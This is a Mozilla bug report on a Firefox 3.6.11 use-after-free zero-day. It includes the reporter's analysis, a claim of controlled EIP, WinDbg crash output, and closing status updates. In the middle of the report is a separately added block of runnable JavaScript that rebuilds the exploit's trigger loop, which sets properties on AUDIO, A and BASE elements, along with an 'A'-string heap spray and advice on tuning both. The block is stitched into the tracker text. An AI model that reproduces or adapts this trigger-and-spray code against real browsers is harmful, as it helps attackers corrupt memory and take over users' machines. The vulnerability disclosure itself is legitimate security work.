Bug 607412 - 0day - bug id 607222
Status: Closed, VERIFIED DUPLICATE of bug 607222
Opened 14 years ago; closed 14 years ago
Categories: Firefox :: Security, defect
Reporter: einar; Unassigned
Whiteboard: [sg:dupe 607222]
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Build Identifier: Firefox 3.6.11
So the vulnerability appears to be some kind of race condition issue in the handling of DOM element (tag) properties. The exploit enumerates all properties of the tags AUDIO, A, and BASE and sets them to 'a' one by one in a loop that spins many times. Unfortunately I'm not too familiar with the Firefox code base, but my theory is that at some point in time, Firefox uses an object in two separate places, but has only incremented the object's reference count once. Consequently, when either part of the code is done with the object, the reference count reaches zero and the object is freed. This triggers a use-after-free condition upon subsequent use of the object, such as seen below.

In order for an attacker to exploit this issue, a heap spray would need to be created in order to fill the freed memory. In this case, it appears that a very big heap spray (>1GB) is needed because of the high address. Hence, low-memory machines would probably fail at running the exploit (I also had some initial problems reproducing in a VM due to low memory). However, this could probably be addressed, which leads me to think that whoever made this exploit did not put much effort into it. I also believe the vulnerability was found by fuzzing, as the author seems to have just brute-forced his way through all the properties until some strange application behavior was triggered.

Btw, I replaced the heap spray with my own (just long strings of 'A's) and was able to hit EIP 0x41414141 without much effort, hence it seems to be highly exploitable.
0:000> r
eax=438a0ee0 ebx=00000000 ecx=038fdb80 edx=00000000 esi=0012ee78 edi=00000000
eip=100ec811 esp=0012e8c8 ebp=0012ea74 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
xul!XPCWrappedNative::GetNewOrUsed+0x21:
100ec811 8b08 mov ecx,dword ptr [eax] ds:0023:438a0ee0=????????
0:000> kb
ChildEBP RetAddr Args to Child
0012ea74 100f77eb 0012ee78 038fdb80 02ab9c80 xul!XPCWrappedNative::GetNewOrUsed+0x21 [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcwrappednative.cpp @ 327]
0012eb0c 100f6e58 0012ecf0 0012ebe0 00000000 xul!XPCConvert::NativeInterface2JSObject+0x28b [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcconvert.cpp @ 1199]
0012ebac 100efe12 0012ecf0 0012ebe0 0012ec60 xul!XPCConvert::NativeData2JS+0x98 [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcconvert.cpp @ 471]
0012ee48 100fc072 0012ee78 00000001 00000000 xul!XPCWrappedNative::CallMethod+0x5e2 [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcwrappednative.cpp @ 2810]
0012ef14 00335c4d 02cc4000 02e93640 00000000 xul!XPC_WN_GetterSetter+0x1b2 [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcwrappednativejsops.cpp @ 1784]
0012efc8 0032a533 02cc4000 00000000 03d3d0f0 js3250!js_Invoke+0x42d [e:\builds\moz2_slave\win32_build\build\js\src\jsinterp.cpp @ 1360]
0012effc 00337de0 02cc4000 02e93640 02e7a580 js3250!js_InternalInvoke+0x103 [e:\builds\moz2_slave\win32_build\build\js\src\jsinterp.cpp @ 1423]
0012f068 0033911a 02cc4000 02e93640 00000000 js3250!js_GetPropertyHelper+0x310 [e:\builds\moz2_slave\win32_build\build\js\src\jsobj.cpp @ 4275]
0012f2b4 003169c5 02cc4000 0012f364 01953090 js3250!js_Interpret+0x115a [e:\builds\moz2_slave\win32_build\build\js\src\jsops.cpp @ 1904]
0012f338 003041a1 02df8760 01953090 00000000 js3250!js_Execute+0x1a5 [e:\builds\moz2_slave\win32_build\build\js\src\jsinterp.cpp @ 1601]
0012f364 100606f3 02cc4000 02df8760 01c6f7e4 js3250!JS_EvaluateUCScriptForPrincipals+0x61 [e:\builds\moz2_slave\win32_build\build\js\src\jsapi.cpp @ 5073]
0012f3d8 1018230e 0012f4ac 02df8760 01c6f7e0 xul!nsJSContext::EvaluateString+0x15e [e:\builds\moz2_slave\win32_build\build\dom\base\nsjsenvironment.cpp @ 1764]
0012f490 10014d80 02e992b0 0012f4ac 02e992b0 xul!nsScriptLoader::EvaluateScript+0x177 [e:\builds\moz2_slave\win32_build\build\content\base\src\nsscriptloader.cpp @ 711]
0012f544 1018f596 02e992b0 02e992b0 02beb5e4 xul!nsScriptLoader::ProcessRequest+0x6f [e:\builds\moz2_slave\win32_build\build\content\base\src\nsscriptloader.cpp @ 625]
0012f8e4 100505ab 02beb5e4 02beb5e4 03d91c00 xul!nsScriptLoader::ProcessScriptElement+0x2e6 [e:\builds\moz2_slave\win32_build\build\content\base\src\nsscriptloader.cpp @ 577]
0012f8fc 10014b17 03d91cbc 03d91c00 02beb5c0 xul!nsScriptElement::MaybeProcessScript+0x74 [e:\builds\moz2_slave\win32_build\build\content\base\src\nsscriptelement.cpp @ 193]
0012f9a8 10014af7 1004227f 00000001 02e99370 xul!nsHTMLScriptElement::MaybeProcessScript+0x1d [e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlscriptelement.cpp @ 565]
0012f9ac 1004227f 00000001 02e99370 00000000 xul!nsHTMLScriptElement::DoneAddingChildren+0xc [e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlscriptelement.cpp @ 490]
0012f9c4 1009c49d 02beb5e4 00000000 03d56380 xul!HTMLContentSink::ProcessSCRIPTEndTag+0x63 [e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp @ 3116]
0012f9e4 1009bce2 00000053 00000000 00000000 xul!SinkContext::CloseContainer+0x11d [e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp @ 1018]
Reproducible: Always
Actual Results:
see details
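As an added example, not code from the bug report, the original exploit or Mozilla: the trigger pattern the reporter describes (walk every property of AUDIO, A and BASE elements, assign 'a' to each one, many rounds over) alongside the 'A'-string spray he substituted. The element is a constructed stand-in (`FakeElement`) so the file runs under Node; in Firefox the same `fuzzTags` call would take `document.createElement`. The names `collectPropertyNames`, `hammerProperties`, `fuzzTags`, `sprayStrings` and `demo` are mine.

```javascript
// Added example, not code from the bug report or from Mozilla: the trigger
// pattern the reporter describes (walk every property of an element, assign
// 'a' to each one, many rounds) next to a string heap spray. The element is
// a constructed stand-in so the file runs under Node; in Firefox you would
// pass document.createElement for the AUDIO, A and BASE tags instead.

const TAGS = ['AUDIO', 'A', 'BASE']; // the three tags named in the report

// Every property name reachable from the object up to (not including)
// Object.prototype, non-enumerable accessors included, since DOM attributes
// such as src or href live as accessors on the prototype, not the instance.
function collectPropertyNames(target) {
  const names = new Set();
  for (let obj = target; obj && obj !== Object.prototype; obj = Object.getPrototypeOf(obj)) {
    for (const name of Object.getOwnPropertyNames(obj)) names.add(name);
  }
  return [...names];
}

// Assign `value` to every collected property, `rounds` times over. A setter
// that throws (or a read-only attribute under strict mode) must not end the
// run, so failures are counted instead of propagated.
function hammerProperties(target, value, rounds) {
  const names = collectPropertyNames(target);
  let assigned = 0;
  let threw = 0;
  for (let round = 0; round < rounds; round++) {
    for (const name of names) {
      try {
        target[name] = value;
        assigned++;
      } catch (err) {
        threw++;
      }
    }
  }
  return { names: names.length, assigned, threw };
}

// Run the loop over one element per tag; `createElement` is whatever
// produces the element (document.createElement in a browser).
function fuzzTags(tagNames, createElement, value, rounds) {
  const results = {};
  for (const tag of tagNames) {
    results[tag] = hammerProperties(createElement(tag), value, rounds);
  }
  return results;
}

// The spray: `count` strings of `length` fill characters held in one array
// so they stay allocated while the freed object is reused. 'A' gives the
// 0x41414141 pattern from the report; the report's spray was over 1GB, the
// sizes used in demo() below are kept tiny on purpose.
function sprayStrings(count, length, fill = 'A') {
  const spray = [];
  for (let i = 0; i < count; i++) spray.push(fill.repeat(length));
  return spray;
}

// Constructed stand-in for a DOM element (hypothetical, for the offline run):
// two data properties, one method and one accessor whose setter throws.
class FakeElement {
  constructor(tagName) {
    this.tagName = tagName;
    this.src = '';
  }
  play() { return true; }
  get brokenProp() { return 0; }
  set brokenProp(v) { throw new TypeError(`${this.tagName}: brokenProp is not settable`); }
}

// Small end-to-end run: a spray of 8 x 64 'A's, then 3 rounds over each tag.
function demo() {
  const spray = sprayStrings(8, 64);
  const results = fuzzTags(TAGS, tag => new FakeElement(tag), 'a', 3);
  return { sprayBytes: spray.reduce((n, s) => n + s.length, 0), results };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The two knobs the report talks about are `rounds` (the loop that "spins many times") and the `count`/`length` passed to `sprayStrings` (the >1GB spray); nothing here reproduces the freed object itself, which needs the real Firefox 3.6.11 element implementations. The `try`/`catch` matters in the browser too: in strict mode an assignment to a read-only DOM attribute throws, and without it the loop would stop at the first such property instead of reaching the one that matters.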
Updated•14 years ago
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 607222]
Comment 2•14 years ago
Einar, I was just replying to your e-mail. I'll follow-up there.
Updated•14 years ago
Group: core-security